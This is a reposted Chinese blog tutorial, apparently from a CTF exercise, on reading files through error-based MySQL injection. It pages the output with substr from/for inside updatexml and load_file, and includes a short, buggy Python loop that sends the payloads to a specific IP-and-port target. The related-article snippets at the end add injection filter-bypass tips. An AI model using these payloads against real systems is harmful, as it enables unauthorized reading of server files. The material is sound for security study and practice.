SQL注入文件读取通过from for分页读取

最新推荐文章于 2022-05-22 17:07:28 发布
最新推荐文章于 2022-05-22 17:07:28 发布
阅读量420 收藏 1
点赞数 1
文章标签: 数据库 python
原文链接:http://www.cnblogs.com/nul1/p/9297045.html
版权

http://103.238.227.13:10088/?id=1

在读取文件的时候发现不能够一下子全部读取出来。经过百度学习了一下,看到别人使用from for说实在此前真不知道这操作。

先来看一下from for吧

 1 mysql> select database();
 2 +------------+
 3 | database() |
 4 +------------+
 5 | typecho    |
 6 +------------+
 7 1 row in set (0.00 sec)
 8 
 9 mysql> select substr(database() from 1 for 2);
10 +---------------------------------+
11 | substr(database() from 1 for 2) |
12 +---------------------------------+
13 | ty                              |
14 +---------------------------------+
15 1 row in set (0.00 sec)
16 
17 mysql> select substr(database() from 2 for 3);
18 +---------------------------------+
19 | substr(database() from 2 for 3) |
20 +---------------------------------+
21 | ype                             |
22 +---------------------------------+
23 1 row in set (0.00 sec)
#说明前面一个数字是从第几个开始读取,最后的一个数字是读取的长度。

大概懂了吧,就是起到一个分页的效果。

那么再用到注入里自然就OK了。

PS:过滤了空格可以用使用/**/进行替换,还有就是updatexml最多只能显示32位的长度,所以for的数字是32。

http://103.238.227.13:10088/?id=1/**/and/**/updatexml(1,concat(1,(select/**/substr(hex(load_file(0x2f7661722f746573742f6b65795f312e706870))from/**/1/**/for/**/32)),1),1)

然后写一个脚本吧from后面的数字每次+32,for也要加就可以了。

以下脚本待完善。

 1 #!/usr/bin/env python
 2 #encoding:utf-8
 3 #by i3ekr
 4 
 5 import requests,re
 6 from lxml import etree
 7 n1 = 1
 8 n2 = 32
 9 
10 for i in range(0,100):
11     url ="""
12 http://103.238.227.13:10088/?id=1/**/and/**/updatexml(1,concat(1,(select/**/substr(hex(load_file(0x2f7661722f746573742f6b65795f312e706870))from/**/%d/**/for/**/%d)),1),1)
13     """%(n1,n2)
14     html = requests.get(url,timeout=5).text
15     print(html)
16     result=re.findall(html,"[A-Z][0-9][A-Z][0-9]")
17     result = re.findall("[A-Z][0-9][A-Z][0-9]{29}",html)
18     print(result)
19     n1+=31
20     n2+=32

 

转载于:https://www.cnblogs.com/nul1/p/9297045.html

weixin_30719711
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
substr()函数——mysql:截取字符串子串
平平淡淡,戒急用忍,一生学闭嘴。
04-04 1839
substr()函数:截取字符串子串 1、substr(str,pos); SELECT SUBSTR('2018-08-17',6); 2、substr(str from pos); SELECT SUBSTR('2018-08-17' FROM 6); 3、substr(str,pos,len);//str:字符串,pos:起始位置,len:截断长度 SELECT SUBSTR('2...
sql注入笔记
qq_45951598的博客
12-13 210
Waf从入门到Bypass SQL注入文件读取通过from for分页读取 过滤单引号的时候可用。
substring substr
越影
02-16 480
substring 方法用于提取字符串中介于两个指定下标之间的字符 substring(start,end) 开始和结束的位置,从零开始的索引 参数     描述start     必需。一个非负的整数,规定要提取的子串的第一个字符在 stringObject 中的位置。stop     可选。一个非负的整数,比要提取的子串的最后一个字符在 stringObject 中的位置多 1。如果省略
Mysql基础(6)函数
TylerGuoj的博客
06-15 429
函数 mysql的函数类似java中的方法,封装了若干实现细节,提高多个sql语句的复用性。 函数使用select作为调用关键字,基本语法为select 函数名(实参列表) from 表名,其中实参列表中的字段来源于数据表,当函数没有参数时,from字句可省略。其可以分为 单行函数 操作行。 只作用在某一行数据,实现某种功能。譬如length()用于计算字符串长度、concat()用于拼接字符串。 mysql引擎会遍历表中的每一行数据,然后执行若干次(表行数)单行函数,最终结果仍是一个数据表。 分组
BugkuCTF——WEB(3)
qq_43592364的博客
01-23 383
三十一、md5 collision 题目网址:http://123.206.87.240:9009/md5.php 题目要我们传入a的值,参考:https://blog.csdn.net/qq_30464257/article/details/81432446 PHP在处理哈希字符串时,会利用”!=”或”==”来对哈希值进行比较,它把每一个以”0E”开头的哈希值都解释为0,所以如果两个...
SQL分页读取海量数据存储过程
01-20
综上所述,SQL分页读取海量数据存储过程是一种高效的数据检索策略,通过合理的设计和优化,可以有效地处理大数据量的查询,提高用户体验,同时降低系统负担。在实际应用中,开发者应根据数据库类型和具体需求选择...
jsp读取数据库实现分页技术简析
01-08
需要注意的是,为了提高安全性,应考虑使用PreparedStatement代替Statement,以防止SQL注入攻击。此外,对于大型应用程序,考虑使用连接池来管理数据库连接,以提高性能和资源利用率。 总结来说,实现JSP分页的关键...
MyBatis-Plus 分页查询以及自定义sql分页的实现
09-07
1. **物理分页**:这是数据库层面的分页,通过 `LIMIT` 和 `OFFSET` 或者其他的数据库特定语法(如 SQL Server 的 `TOP` 和 `SKIP`)来限制返回的数据量。物理分页读取需要的数据,内存占用少,且能实时反映数据库...
Android提高之SQLite分页读取实现方法
09-04
总之,Android的SQLite分页读取通过合理使用`LIMIT`和`OFFSET`,结合自定义的适配器和用户交互,可以有效地管理和显示大量数据。在实际项目中,还需要根据具体需求进行相应的错误处理和性能优化。
web安全之SQL注入绕过技术(二)
Longwaer
02-24 1434
学习掌握SQL注入绕过技术,更好的用于日常渗透测试中发现风险点。
SQL注入绕过技巧
weixin_33970449的博客
07-29 1016
1.绕过空格(注释符/* */,%a0):   两个空格代替一个空格,用Tab代替空格,%a0=空格: %20 %09 %0a %0b %0c %0d %a0 %00 /**/ /*!*/ 最基本的绕过方法,用注释替换空格: /* 注释 */ 使用浮点数: select * from users where id=8E0union select 1,2,...
常见的SQL注入类型
weixin_49182737的博客
05-22 1万+
sql注入的基本分类
mysql中 for update 使用
神都燕
04-24 1万+
解释: for update是在数据库中上锁用的,可以为数据库中的行上一个排它锁。当一个事务的操作未完成时候,其他事务可以读取但是不能写入或更新。 例子: 比如一张表三个字段 , id(商品id), name(商品名字) , count(数量) 当商品抢购时候会显示剩余商品件数,如果并发量大的时候,商品自减的值可能不准确。所以当我们在一个事务中对count字段进行修改的时候,...
数据库截取字符串SUBSTR函数的使用
dinghuoruo0011的博客
07-17 918
背景 今天中午做需求的时候,有类似于根据银行卡卡号的前几位判断出是哪个银行的情况,每个银行需要截取的位数都不一样,这时我就想到了SUBSTR 数据库截取字符串SUBSTR函数的使用 假设有一个表的结构如下(表名tlk_bnkld_card) 写sql语句的时候就能看到有很多的substr函数的提示,各人根据需求选用。 其中的 str表示被截取的字段     p...
mysql中的substr()函数使用
i_hanjt的博客
06-01 2万+
对于JavaScript的substring() 方法或者String的subString()方法,相信很多人都有用过,最近因为工作的需要,需要在sql中对字段进行切割。下面是我在网上收集的一些信息。 SUBSTR函数是用来截取数据库某一列字段中的一部分。 在各个数据库的函数名称不一样 MySQL: SUBSTR( ), SUBSTRING( ) Oracle: SUBS...
bugku学习之43.sql注入2(只剩下from没过滤其余的全部过滤)
s11show_163的博客
03-05 293
考察: 逗号被过滤:substr(from for)或者mid(from for)截断 for被过滤:不使用for则mid(from)默认截断到字符串位 空格被过滤:不使用空格 admin字符串与另一个字符串比较时会被翻译成0或者空格 所以’admin’-’‘的意思是减去空字符串,所以值为0,更深远的’admin’-0-’‘先减去0再减去空字符串,值也为0,而’admin’-1-’'的值则为1。...
SQL语句中截取字符串Substr
面朝大海,春暖花开
12-18 1万+
不同的数据库中提供的函数不同: Oracle数据库提供的截取字符串函数是:Substr substr(stirng1,strat,length);截取功能;  解析一下:string1是你要截取的字符串,strat是要开始截取的位置,length是你要截取多少个字符串。  在Access数据库中截取字符串采用:Left、Right、Mid三个函数可以进行: 1、Left(Colu
sql: substr函数用法
热门推荐
c_xiaobao的专栏
05-07 9万+
SUBSTR(str,pos,len): 从pos开始的位置,截取len个字符 substr(string ,1,3) :取string左边第1位置起,3字长的字符串。 所以结果为: str substr(string, -1,3):取string右边第1位置起,3字长的字符串。显然右边第一位置起往右不够3字长。结果只能是: g substr(string, -3,3):取stri
MySQL中的substr()函数
weixin_33989058的博客
08-17 1438
substr()函数 1、substr(str,pos); SELECT SUBSTR('2018-08-17',6); 2、substr(str from pos); SELECT SUBSTR('2018-08-17' FROM 6); 3、substr(str,pos,len);//str:字符串,pos:起始位置,len:截断长度 S...
易语言 超级列表框分页读取sql数据库
最新发布
01-13
易语言是一种专门为编写Windows平台软件而设计的编程语言,它提供了丰富的...通过以上步骤,我们就可以实现在易语言中使用超级列表框来分页读取SQL数据库中的数据。这样就可以方便用户浏览大量数据,并且操作简单方便。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值